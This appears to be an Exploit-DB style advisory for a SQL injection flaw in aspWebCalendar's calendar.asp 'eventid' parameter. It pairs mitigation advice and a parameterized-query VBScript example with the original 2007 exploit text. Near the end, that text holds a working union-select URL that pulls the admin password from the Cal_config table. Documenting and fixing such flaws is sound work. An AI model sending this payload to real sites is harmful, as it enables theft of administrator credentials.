Vendor: aspWebCalendar
By: parad0x
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: aspWebCalendar
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

aspWebCalendar Remote SQL Injection Vulnerability

This vulnerability allows an attacker to perform SQL injection by manipulating the 'eventid' parameter in the 'calendar.asp' page. The example exploit provided demonstrates the use of a union-based SQL injection technique to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs before using them in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.
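
One way to apply both recommendations to the 'eventid' lookup in a classic ASP page, as an added example that is not aspWebCalendar's own code: the value is accepted only if it is a plain decimal integer, and it is then bound as a typed parameter through ADODB.Command instead of being concatenated into the SQL text. The connection-string setting, the Cal_Events table and its column names are hypothetical.

```vbscript
<%
Option Explicit

' ADO constants (standard values from adovbs.inc).
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

' Returns the id as a Long, or -1 if the input is anything other than
' 1 to 9 decimal digits (so signs, spaces, keywords and repeated
' parameters are all rejected before any SQL is built).
Function ParseEventId(raw)
    Dim re, s
    ParseEventId = -1
    s = raw & ""                      ' coerce the QueryString item to a string
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"       ' 9 digits always fits in a Long
    If re.Test(s) Then ParseEventId = CLng(s)
End Function

Dim eventId, conn, cmd, rs
eventId = ParseEventId(Request.QueryString("eventid"))
If eventId < 1 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("CalendarConnString")   ' hypothetical setting name

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' Hypothetical table and columns; the ? placeholder keeps data out of the SQL text.
cmd.CommandText = "SELECT EventTitle, EventDate FROM Cal_Events WHERE EventId = ?"
cmd.Parameters.Append cmd.CreateParameter("eventid", adInteger, adParamInput, , eventId)

Set rs = cmd.Execute
If Not rs.EOF Then
    ' Encode on output so stored values cannot inject markup.
    Response.Write Server.HTMLEncode(rs("EventTitle") & "")
End If
rs.Close
conn.Close
%>
```

With this in place, a request such as the example below is rejected with a 400 response before any query runs, because its 'eventid' value is not a plain integer.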
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  aspWebCalendar Remote SQL Injection Vulnerability
# Author  :  parad0x
# Contact :  :(
# D.Page  :  http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$      :  free
#S.Page : http://fullrevolution.com
*******************************************************************************
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]

Example:

/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config

"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron

"""""""""""""""""""""
www.p4r4d0x.com

# milw0rm.com [2007-03-22]